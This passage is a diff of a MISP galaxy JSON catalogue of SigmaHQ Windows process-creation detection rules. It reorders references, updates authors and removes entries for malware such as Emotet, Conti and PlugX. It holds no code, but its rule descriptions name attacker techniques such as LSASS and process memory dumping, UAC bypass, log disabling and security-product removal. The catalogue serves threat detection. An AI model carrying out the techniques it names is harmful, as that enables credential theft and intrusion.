- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f",
- "value": "Turla Group Lateral Movement"
- },
{
"description": "Extract data from cab file and hide it in an alternate data stream",
"meta": {
@@ -60010,8 +57964,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://ss64.com/nt/logman.html",
"https://twitter.com/0gtweet/status/1359039665232306183?s=21",
+ "https://ss64.com/nt/logman.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml"
],
"tags": [
@@ -60052,11 +58006,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
- "https://twitter.com/cglyer/status/1355171195654709249",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://twitter.com/cglyer/status/1355171195654709249",
"https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml"
],
"tags": [
@@ -60089,9 +58043,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md",
"https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html",
"https://github.com/frgnca/AudioDeviceCmdlets",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml"
],
"tags": [
@@ -60111,58 +58065,6 @@
"uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6",
"value": "Audio Capture via PowerShell"
},
- {
- "description": "Detects specific process characteristics of Maze ransomware word document droppers",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/05/08",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_maze_ransomware.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
- "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/",
- "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_maze_ransomware.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1204.002",
- "attack.t1047",
- "attack.impact",
- "attack.t1490"
- ]
- },
- "related": [
- {
- "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052",
- "value": "Potential Maze Ransomware Activity"
- },
{
"description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file",
"meta": {
@@ -60176,9 +58078,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf",
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml"
],
"tags": [
@@ -60211,10 +58113,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return",
- "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/",
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://nodejs.org/api/cli.html",
+ "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml"
],
"tags": [
@@ -60247,9 +58149,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/hfiref0x/UACME",
"https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b",
"https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
+ "https://github.com/hfiref0x/UACME",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml"
],
"tags": [
@@ -60270,57 +58172,6 @@
"uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc",
"value": "UAC Bypass Using ChangePK and SLUI"
},
- {
- "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/11/23",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2017_11882.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100",
- "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1203",
- "attack.t1204.002",
- "attack.initial_access",
- "attack.t1566.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a",
- "value": "Droppers Exploiting CVE-2017-11882"
- },
{
"description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n",
"meta": {
@@ -60367,8 +58218,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware",
"https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior",
+ "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml"
],
"tags": [
@@ -60388,41 +58239,6 @@
"uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f",
"value": "Fsutil Behavior Set SymlinkEvaluation"
},
- {
- "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/06/12",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/",
- "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_plugx_susp_exe_locations.yml"
- ],
- "tags": [
- "attack.s0013",
- "attack.defense_evasion",
- "attack.t1574.002"
- ]
- },
- "related": [
- {
- "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "aeab5ec5-be14-471a-80e8-e344418305c2",
- "value": "Potential PlugX Activity"
- },
{
"description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID",
"meta": {
@@ -60544,40 +58360,6 @@
"uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8",
"value": "Suspicious Hacktool Execution - Imphash"
},
- {
- "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'",
- "meta": {
- "author": "Aedan Russell, frack113 (sigma)",
- "creation_date": "2022/06/19",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_browsers_chrome_load_extension.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/chromeloader/",
- "https://emkc.org/s/RJjuLa",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chrome_load_extension.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1176"
- ]
- },
- "related": [
- {
- "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e",
- "value": "Powershell ChromeLoader Browser Hijacker"
- },
{
"description": "Detects Obfuscated use of Environment Variables to execute PowerShell",
"meta": {
@@ -60699,9 +58481,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/",
"https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/",
"http://www.xuetr.com/",
+ "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml"
],
"tags": "No established tags"
@@ -60792,40 +58574,6 @@
"uuid": "502b42de-4306-40b4-9596-6f590c81f073",
"value": "Local Accounts Discovery"
},
- {
- "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.",
- "meta": {
- "author": "David Burkett, Florian Roth",
- "creation_date": "2019/12/28",
- "falsepositive": [
- "Rare System Admin Activity"
- ],
- "filename": "proc_creation_win_malware_trickbot_recon_activity.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/",
- "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1482"
- ]
- },
- "related": [
- {
- "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "410ad193-a728-4107-bc79-4419789fcbf8",
- "value": "Trickbot Malware Reconnaissance Activity"
- },
{
"description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines",
"meta": {
@@ -60901,50 +58649,6 @@
"uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e",
"value": "Arbitrary Shell Command Execution Via Settingcontent-Ms"
},
- {
- "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/09/08",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/h3v0x/CVE-2021-26084_Confluence",
- "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
- "https://nvd.nist.gov/vuln/detail/CVE-2021-26084",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.execution",
- "attack.t1190",
- "attack.t1059"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11",
- "value": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt"
- },
{
"description": "Detects new process creation using WMIC via the \"process call create\" flag",
"meta": {
@@ -61050,9 +58754,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md",
- "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md",
+ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml"
],
"tags": [
@@ -61094,8 +58798,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/pabraeken/status/990758590020452353",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/",
"https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml"
],
"tags": [
@@ -61115,39 +58819,6 @@
"uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2",
"value": "Malicious PE Execution by Microsoft Visual Studio Debugger"
},
- {
- "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/08/11",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_other_systemnightmare.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/GossiTheDog/SystemNightmare",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_other_systemnightmare.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1068"
- ]
- },
- "related": [
- {
- "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16",
- "value": "Potential SystemNightmare Exploitation Attempt"
- },
{
"description": "Detects scheduled task creations that have suspicious action command and folder combinations",
"meta": {
@@ -61358,9 +59029,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
- "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html",
"https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/",
+ "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html",
+ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml"
],
"tags": [
@@ -61371,9 +59042,9 @@
"value": "DriverQuery.EXE Execution"
},
{
- "description": "Detects a process memory dump performed by RdrLeakDiag.exe",
+ "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory",
"meta": {
- "author": "Cedric MAURUGEON",
+ "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2021/09/24",
"falsepositive": [
"Unknown"
@@ -61383,7 +59054,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/0gtweet/status/1299071304805560321?s=21",
"https://www.pureid.io/dumping-abusing-windows-credentials-part-1/",
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
+ "https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"
],
"tags": [
@@ -61401,51 +59075,7 @@
}
],
"uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b",
- "value": "Process Dump via RdrLeakDiag.exe"
- },
- {
- "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM",
- "meta": {
- "author": "MSTIC, FPT.EagleEye",
- "creation_date": "2021/06/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_sourgrum.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/",
- "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml",
- "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml"
- ],
- "tags": [
- "attack.t1546",
- "attack.t1546.015",
- "attack.persistence",
- "attack.privilege_escalation"
- ]
- },
- "related": [
- {
- "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd",
- "value": "SOURGUM Actor Behaviours"
+ "value": "Process Memory Dump via RdrLeakDiag.EXE"
},
{
"description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP",
@@ -61460,10 +59090,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
"https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml"
],
"tags": [
@@ -61530,8 +59160,8 @@
"logsource.product": "windows",
"refs": [
"https://www.echotrail.io/insights/search/mshta.exe",
- "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
"https://en.wikipedia.org/wiki/HTML_Application",
+ "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"
],
"tags": [
@@ -61564,8 +59194,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
+ "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml"
],
"tags": [
@@ -61606,8 +59236,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html",
"https://twitter.com/eral4m/status/1451112385041911809",
+ "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml"
],
"tags": [
@@ -61641,8 +59271,8 @@
"logsource.product": "windows",
"refs": [
"https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
- "https://www.nirsoft.net/utils/nircmd2.html#using",
"https://www.nirsoft.net/utils/nircmd.html",
+ "https://www.nirsoft.net/utils/nircmd2.html#using",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml"
],
"tags": [
@@ -61699,7 +59329,7 @@
{
"description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential",
"meta": {
- "author": "frack113",
+ "author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2021/07/20",
"falsepositive": [
"Unknown"
@@ -61876,9 +59506,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md",
"https://github.com/swagkarna/Defeat-Defender-V1.2.0",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_permission_modifications.yml"
],
"tags": [
@@ -61911,8 +59541,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
"https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml"
],
"tags": [
@@ -61953,8 +59583,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/danielbohannon/Invoke-DOSfuscation",
"https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf",
+ "https://github.com/danielbohannon/Invoke-DOSfuscation",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml"
],
"tags": [
@@ -62016,56 +59646,6 @@
"uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f",
"value": "Potential Encoded PowerShell Patterns In CommandLine"
},
- {
- "description": "Detects commands used by Turla group as reported by ESET in May 2020",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/05/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_turla_comrat_may20.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml"
- ],
- "tags": [
- "attack.g0010",
- "attack.execution",
- "attack.t1059.001",
- "attack.t1053.005",
- "attack.t1027"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c",
- "value": "Turla Group Commands May 2020"
- },
{
"description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)",
"meta": {
@@ -62134,86 +59714,6 @@
"uuid": "b7966f4a-b333-455b-8370-8ca53c229762",
"value": "Dropping Of Password Filter DLL"
},
- {
- "description": "Detects a command used by conti to dump database",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/08/16",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15",
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
- "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_ransomware_database_dump.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1005"
- ]
- },
- "related": [
- {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b",
- "value": "Potential Conti Ransomware Database Dumping Activity"
- },
- {
- "description": "Detects all Emotet like process executions that are not covered by the more generic rules",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/09/30",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_emotet.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/",
- "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/",
- "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/",
- "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.defense_evasion",
- "attack.t1027"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
